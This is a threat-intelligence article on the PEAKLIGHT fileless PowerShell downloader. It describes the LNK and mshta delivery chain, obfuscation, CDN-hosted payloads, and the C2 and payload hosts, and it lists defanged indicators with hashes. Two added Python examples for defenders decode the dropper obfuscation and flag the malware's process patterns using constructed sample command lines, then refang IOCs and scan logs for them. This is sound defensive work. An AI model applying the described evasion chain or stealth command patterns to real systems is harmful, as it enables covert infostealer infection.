Cybersecurity analysts at Mandiant recently identified a stealthy memory malware dubbed “PEAKLIGHT.”
Stealthy memory-resident malware of this kind is often referred to as fileless malware: it lives only in a computer’s RAM and consequently evades conventional antivirus solutions that rely on disk scanning.
Because this kind of malware leaves no traces on the hard drive, it is difficult to identify and remove.
Technical Analysis
This sophisticated multi-stage malware attack chain begins with movie-themed lures containing malicious Microsoft Shortcut (LNK) files.
These LNK files execute obfuscated JavaScript droppers through system binary proxy execution (MITRE ATT&CK T1218.005) using forfiles.exe or PowerShell wildcards to launch mshta.exe.
The dropper, obfuscated with decimal-encoded ASCII and String.fromCharCode(), decrypts and executes a PowerShell-based downloader dubbed PEAKLIGHT. PEAKLIGHT variants target either %AppData% or %ProgramData%, employing either hex-encoded (AES-CBC) or base64-encoded (AES-ECB with GZIP compression) payloads.
According to the Mandiant report, it downloads and executes ZIP files (L1.zip/L2.zip or K1.zip/K2.zip) from content delivery networks (CDNs) such as nextomax.b-cdn[.]net or potexo.b-cdn[.]net, which contain infostealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.
Evasion techniques include memory-only execution, the use of CDNs to bypass security filters, and playing a decoy video file (video.mp4) to put the user at ease.
The attack also makes use of ActiveX objects (WScript.Shell) for system-level privileges and runs PowerShell with the -WindowStyle hidden, -ExecutionPolicy Unrestricted, and -NoProfile parameters to stay hidden.
The malware checks for files that are already present, downloads any missing components, and executes payloads through custom functions responsible for file operations, ZIP extraction, and URL deobfuscation.
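As an added example for defenders (not Mandiant’s code and not any part of the malware), the Python below does two things that follow from the chain described above: it decodes the decimal-encoded String.fromCharCode() obfuscation so the PowerShell command hidden inside a dropper can be read, and it flags process-creation records that match the forfiles.exe/mshta.exe proxy-execution pattern and the -WindowStyle hidden / -ExecutionPolicy Unrestricted / -NoProfile combination. The dropper sample and the process records are constructed for the example; the abbreviated flag forms (-w, -ep, -nop) go beyond what the text lists and are included because PowerShell accepts them.

```python
"""Analyst helpers for the PEAKLIGHT delivery chain.

Added example, not Mandiant's code and not the malware itself. Part 1 decodes
the String.fromCharCode() obfuscation the dropper uses; part 2 flags process
events matching the execution pattern in the text. All samples are constructed.
"""
import re

# ---- Part 1: decode String.fromCharCode(decimal, decimal, ...) -------------

# Captures the decimal argument list of every String.fromCharCode(...) call.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+?)\s*\)", re.IGNORECASE)


def decode_fromcharcode(script: str) -> list[str]:
    """Return the plaintext built by each String.fromCharCode(...) call in script."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(script):
        codes = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
        decoded.append("".join(chr(code) for code in codes))
    return decoded


# Constructed sample: a command encoded the way the text describes, so the decoder
# can be checked against a known plaintext. Write-Host stands in for a real payload.
HIDDEN_COMMAND = ("powershell -WindowStyle hidden -ExecutionPolicy Unrestricted "
                  "-NoProfile -Command \"Write-Host placeholder\"")
SAMPLE_DROPPER = (
    "var s = String.fromCharCode(" + ",".join(str(ord(c)) for c in HIDDEN_COMMAND) + ");\n"
    "var o = String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108);\n"  # "WScript.Shell"
)

# ---- Part 2: flag process-creation records ---------------------------------

# Full flag names from the text plus the prefixes PowerShell accepts (-w, -ep, -nop).
PS_FLAG_PATTERNS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "unrestricted policy": re.compile(r"-(?:ep|executionpolicy)\s+unrestricted\b", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}
# Parents that indicate mshta.exe was reached through a proxy-execution chain.
PROXY_PARENTS = {"forfiles.exe", "cmd.exe", "powershell.exe", "wscript.exe"}


def classify_process_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Return human-readable findings for one (parent, image, command line) record."""
    parent, image = parent.lower(), image.lower()
    findings = []
    if image == "mshta.exe" and parent in PROXY_PARENTS:
        findings.append(f"mshta.exe launched by {parent} (T1218.005 proxy execution)")
    if image == "forfiles.exe" and "mshta" in cmdline.lower():
        findings.append("forfiles.exe used to launch mshta.exe")
    if image in {"powershell.exe", "pwsh.exe"}:
        hits = [name for name, pat in PS_FLAG_PATTERNS.items() if pat.search(cmdline)]
        # -NoProfile alone is common in legitimate automation; require two of three.
        if len(hits) >= 2:
            findings.append("PowerShell stealth flags: " + ", ".join(hits))
        if parent == "mshta.exe":
            findings.append("PowerShell spawned by mshta.exe")
    return findings


# Constructed process-creation records: (parent image, image, command line).
SAMPLE_PROCESS_EVENTS = [
    ("explorer.exe", "forfiles.exe", 'forfiles.exe /c "mshta.exe https://cdn.example.invalid/x"'),
    ("forfiles.exe", "mshta.exe", "mshta.exe https://cdn.example.invalid/x"),
    ("mshta.exe", "powershell.exe",
     "powershell.exe -WindowStyle hidden -ExecutionPolicy Unrestricted -NoProfile -Command placeholder"),
    ("cmd.exe", "powershell.exe", "powershell.exe -nop -w h -ep unrestricted -c placeholder"),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ("services.exe", "msiexec.exe", "msiexec.exe /i app.msi /qn"),
]


def scan_events(events):
    """Return [(image, findings)] for every record that produced at least one finding."""
    return [(image, found) for parent, image, cmdline in events
            if (found := classify_process_event(parent, image, cmdline))]


if __name__ == "__main__":
    for text in decode_fromcharcode(SAMPLE_DROPPER):
        print("decoded:", text)
    for image, found in scan_events(SAMPLE_PROCESS_EVENTS):
        print(image, "->", "; ".join(found))
```

The two-of-three threshold on the PowerShell flags is deliberate: -NoProfile on its own appears in plenty of legitimate scheduled tasks, whereas the combination with a hidden window and an unrestricted execution policy, or a parent of mshta.exe, is what distinguishes the chain described above.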
PEAKLIGHT is a sophisticated, multi-stage obfuscated PowerShell-based downloader that checks for ZIP archives in hard-coded file paths and retrieves them from content delivery networks (CDNs) if absent.
It delivers payloads including LUMMAC.V2, SHADOWLADDER, and CRYPTBOT.
Multiple variants exist, each downloading specific archives (L1.zip, L2.zip, K1.zip, K2.zip) containing malicious components such as the Cryptbot infostealer, SHADOWLADDER malware configurations, and malicious DLLs (e.g., LiteSkinUtils.dll, WebView2Loader.dll).
These archives also include legitimate executables (Setup.exe, aaaa.exe, Jfts.exe) for DLL side-loading.
PEAKLIGHT makes use of utilities such as the More utility (more.com) and comp.exe to drop additional files, including AutoIt3 files (Hofla.au3, Ufa.au3) and infostealer payloads such as erefgojgbu and oqnhustu.
Various obfuscation and evasion techniques are used by the malware including system binary proxy execution, dynamic-link library (DLL) side-loading, and CDN abuse.
Known command and control (C2) URLs include https://brewdogebar[.]com/code.vue and http://gceight8vt[.]top/upload.php; payloads are hosted at matodown.b-cdn[.]net.
PEAKLIGHT’s intricate structure and evasion techniques show that advanced detection methods and continuous monitoring are necessary parts of a cybersecurity defense.
Indicators of Compromise (IOCs)
Network-Based IOCs
PEAKLIGHT NBIs:
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
hxxps://potexo.b-cdn[.]net/potexo
LUMMAC.V2 C2s:
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
detailbaconroollyws[.]shop
messtimetabledkolvk[.]shop
considerrycurrentyws[.]shop
understanndtytonyguw[.]shop
patternapplauderw[.]shop
horsedwollfedrwos[.]shop
tropicalironexpressiw[.]shop
CRYPTBOT C2s:
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue
SHADOWLADDER:
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://fatodex.b-cdn[.]net/K1.zip
hxxps://fatodex.b-cdn[.]net/K2.zip
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
hxxps://matodown.b-cdn[.]net/K1.zip
hxxps://matodown.b-cdn[.]net/K2.zip
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://nextomax.b-cdn[.]net/L2.zip
hxxps://potexo.b-cdn[.]net/K1.zip
hxxps://potexo.b-cdn[.]net/K2.zip
Host-Based IOCs
CRYPTBOT:
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)
LUMMAC.V2:
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)
PEAKLIGHT:
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)
SHADOWLADDER:
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)
K1.zip (MD5: b6b8164feca728db02e6b636162a2960)
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)
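As an added example (not Mandiant’s tooling and not code from the page), the Python below turns the published indicators into something a SOC can run: it refangs the hxxp and [.] notation, separates hosts, full URLs and MD5 hashes, and scans log lines for any of them. It uses a subset of the indicators listed above; the log lines are constructed. Hosts are matched exactly rather than by parent domain, because b-cdn.net is a legitimate CDN provider and only the specific subdomains are indicators.

```python
"""IOC matcher for the PEAKLIGHT indicator list.

Added example for defenders, not Mandiant's tooling. It refangs the published
indicators (hxxp -> http, [.] -> .), sorts them into hosts, full URLs and MD5
hashes, and checks log lines against them. The indicators are a subset of the
list above; the log lines are constructed for the example.
"""
import re
from urllib.parse import urlparse

RAW_NETWORK_IOCS = """
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://potexo.b-cdn[.]net/K1.zip
"""
RAW_HOST_IOCS = """
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
"""

MD5_RE = re.compile(r"\(MD5:\s*([0-9a-f]{32})\)", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# A dotted hostname or an IPv4 literal appearing anywhere in a log line.
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b|\b(?:\d{1,3}\.){3}\d{1,3}\b", re.I)
MD5_TOKEN_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return re.sub(r"^hxxp", "http", indicator.strip(), flags=re.I).replace("[.]", ".")


def host_of(indicator: str) -> str:
    """Bare host of a refanged URL or domain indicator, lower-cased."""
    if "://" in indicator:
        return (urlparse(indicator).hostname or "").lower()
    return indicator.split("/")[0].lower()


def load_network_iocs(raw: str) -> tuple[set[str], set[str]]:
    """Return (hosts, urls). Hosts are kept exact: the parent b-cdn.net is a
    legitimate CDN, so only the listed subdomains count as indicators."""
    hosts, urls = set(), set()
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        ioc = refang(line)
        hosts.add(host_of(ioc))
        if "://" in ioc:
            urls.add(ioc.lower())
    return hosts, urls


def load_hashes(raw: str) -> set[str]:
    """Collect every '(MD5: ...)' value from the host-based indicator list."""
    return {m.group(1).lower() for m in MD5_RE.finditer(raw)}


def scan_log_line(line, hosts, urls, hashes):
    """Return [(kind, value)] for every indicator found in one log line."""
    hits = []
    for url in URL_RE.findall(line):
        if url.lower() in urls:
            hits.append(("url", url))
    for host in HOST_RE.findall(line):
        if host.lower() in hosts:
            hits.append(("host", host.lower()))
    for digest in MD5_TOKEN_RE.findall(line):
        if digest.lower() in hashes:
            hits.append(("md5", digest.lower()))
    return hits


def scan_log(lines, hosts, urls, hashes):
    """Return [(line_number, hits)] for lines with at least one indicator match."""
    return [(i, found) for i, line in enumerate(lines, 1)
            if (found := scan_log_line(line, hosts, urls, hashes))]


HOSTS, URLS = load_network_iocs(RAW_NETWORK_IOCS)
HASHES = load_hashes(RAW_HOST_IOCS)

# Constructed log lines (DNS, proxy and EDR file inventory) for the example.
SAMPLE_LOG_LINES = [
    "2024-08-20T10:02:11Z dns client=10.0.0.12 query=fatodex.b-cdn.net type=A",
    "2024-08-20T10:02:13Z proxy client=10.0.0.12 method=GET url=https://nextomax.b-cdn.net/L1.zip status=200",
    "2024-08-20T10:02:15Z proxy client=10.0.0.12 method=GET url=https://assets.b-cdn.net/site.css status=200",
    "2024-08-20T10:03:40Z edr host=WS-12 file=C:\\ProgramData\\L2.zip md5=307f40ebc6d8a207455c96d34759f1f3",
    "2024-08-20T10:05:00Z dns client=10.0.0.7 query=relaxtionflouwerwi.shop type=A",
    "2024-08-20T10:06:00Z dns client=10.0.0.7 query=updates.example.com type=A",
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG_LINES, HOSTS, URLS, HASHES):
        print(f"line {number}: {found}")
```

The third sample line (a constructed assets.b-cdn.net request) is there to show why the host match has to be exact: blocking or alerting on the whole b-cdn.net zone would hit ordinary CDN traffic, while the attacker-controlled subdomains and full download URLs from the list match cleanly.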